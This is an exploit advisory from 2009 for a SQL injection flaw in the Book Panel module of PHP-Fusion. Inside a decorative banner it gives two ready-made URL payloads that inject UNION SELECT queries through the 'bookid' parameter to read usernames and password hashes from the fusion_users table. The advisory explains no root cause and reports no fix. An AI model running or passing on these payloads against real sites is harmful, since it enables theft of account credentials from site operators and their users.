PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability

2009-03-09 21:39:08

/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\
+ +
+ |----------------------------------------------------------------| +
+ | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability | +
+ |----------------------------------------------------------------| +
+ +
+ [-] ...Cos co robie z czystej pasji, cos co lubie i czym sie fascynuje :-) +
+ +
+ |--------------------------------| +
+ | Author: elusiven from Poland ! | +
+ | Contact: [email protected] | +
+ | Greetings: Fusi0n Group | +
+ |--------------------------------| +
+ +
+ Exploit: +
+ +
+ http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users-- +
+ http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users-- +
+ +
\+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/

/join #wyjadacze on irc.quakenet.org

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.